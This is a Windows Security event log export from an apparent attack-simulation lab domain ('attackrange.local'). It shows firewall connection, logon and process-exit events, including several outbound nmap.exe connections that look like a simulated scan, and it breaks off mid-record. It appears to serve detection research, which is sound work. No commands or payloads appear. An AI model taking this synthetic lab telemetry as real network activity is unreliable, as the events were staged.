LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887307
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1283
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:28:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887309
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x458
Process Name: C:\Windows\System32\dllhost.exe
Exit Status: 0x0
04/19/2021 06:28:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278971
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0xbf4
Process Name: C:\Windows\System32\taskhostw.exe
Exit Status: 0x0
04/19/2021 06:28:19 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887311
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 174.27.138.219
Source Port: 60806
Destination Address: 10.0.1.14
Destination Port: 3389
Protocol: 6
Filter Information:
Filter Run-Time ID: 66848
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:28:19 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887310
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 174.27.138.219
Source Port: 60806
Destination Address: 10.0.1.14
Destination Port: 3389
Protocol: 6
Filter Information:
Filter Run-Time ID: 66849
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:28:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278972
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3840
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53930
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887314
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 6816
Application Name: \device\harddiskvolume1\program files\mozilla firefox\firefox.exe
Network Information:
Direction: Inbound
Source Address: 127.0.0.1
Source Port: 58259
Destination Address: 127.0.0.1
Destination Port: 58258
Protocol: 6
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:28:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887313
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1284
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887312
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1284
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:28:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278973
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x142c
Process Name: C:\Windows\System32\dllhost.exe
Exit Status: 0x0
04/19/2021 06:28:27 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278974
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3840
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53931
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:28 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887316
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1285
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:28 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887315
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1285
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:28:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=887330
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x8FC071
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 06:28:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887329
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 5348
Application Name: \device\harddiskvolume1\program files (x86)\nmap\nmap.exe
Network Information:
Direction: Outbound
Source Address: 80.152.8.2
Source Port: 0
Destination Address: 77.176.0.0
Destination Port: 0
Protocol: 255
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887328
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 5348
Application Name: \device\harddiskvolume1\program files (x86)\nmap\nmap.exe
Network Information:
Direction: Outbound
Source Address: 80.152.8.3
Source Port: 0
Destination Address: 128.251.0.0
Destination Port: 0
Protocol: 255
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887327
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 5348
Application Name: \device\harddiskvolume1\program files (x86)\nmap\nmap.exe
Network Information:
Direction: Outbound
Source Address: 80.24.8.4
Source Port: 0
Destination Address: 100.249.0.0
Destination Port: 0
Protocol: 255
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=887326
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8FC071
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {59EBA460-5AD1-E5F1-2935-C9E9C7858E5D}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 127.0.0.1
Source Port: 1287
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 06:28:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=887325
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x8FC071
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 06:28:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887324
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 5348
Application Name: \device\harddiskvolume1\program files (x86)\nmap\nmap.exe
Network Information:
Direction: Outbound
Source Address: 80.16.8.5
Source Port: 0
Destination Address: 22.79.0.0
Destination Port: 0
Protocol: 255
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887323
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: 127.0.0.1
Source Port: 1287
Destination Address: 127.0.0.1
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:28:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887322
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2752
Application Name: \device\harddiskvolume1\windows\adws\microsoft.activedirectory.webservices.exe
Network Information:
Direction: Outbound
Source Address: 127.0.0.1
Source Port: 1287
Destination Address: 127.0.0.1
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65789
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887321
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 2752
Application Name: \device\harddiskvolume1\windows\adws\microsoft.activedirectory.webservices.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1287
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:28:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887320
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 5348
Application Name: \device\harddiskvolume1\program files (x86)\nmap\nmap.exe
Network Information:
Direction: Outbound
Source Address: 128.194.32.0
Source Port: 0
Destination Address: 3.24.0.0
Destination Port: 0
Protocol: 255
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887319
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2752
Application Name: \device\harddiskvolume1\windows\adws\microsoft.activedirectory.webservices.exe
Network Information:
Direction: Outbound
Source Address: ::1
Source Port: 1286
Destination Address: ::1
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:28:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887318
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 2752
Application Name: \device\harddiskvolume1\windows\adws\microsoft.activedirectory.webservices.exe
Network Information:
Source Address: ::
Source Port: 1286
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:28:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887317
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 5348
Application Name: \device\harddiskvolume1\program files (x86)\nmap\nmap.exe
Network Information:
Direction: Outbound
Source Address: 80.148.0.0
Source Port: 0
Destination Address: 112.105.0.0
Destination Port: 0
Protocol: 255
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:32 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887331
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 63912
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 49669
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:28:33 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887341
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 49704
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:28:33 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887340
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 49704
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:28:33 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887339
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 49704
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:28:33 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887338
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 49704
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:28:33 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887337
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 49704
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:28:33 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887336
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 49704
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:28:33 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887335
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 49704
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:28:33 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887334
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 49704
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:28:33 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278975
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3840
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53932
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:33 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887333
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1288
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:33 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887332
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1288
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:28:38 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278976
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3840
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53933
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:39 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887343
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1289
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:28:39 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887342
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1289
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:28:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887347
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 0.0.0.0
Source Port: 68
Destination Address: 255.255.255.255
Destination Port: 67
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:28:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887346
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Direction: Outbound
Source Address: fe80::ffff:ffff:fffe
Source Port: 135
Destination Address: ff02::1:ff00:4c4f
Destination Port: 0
Protocol: 58
Filter Information:
Filter Run-Time ID: 69912
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:28:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887345
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 0.0.0.0
Source Port: 68
Destination Address: 255.255.255.255
Destination Port: 67
Protocol: 17
Filter Information:
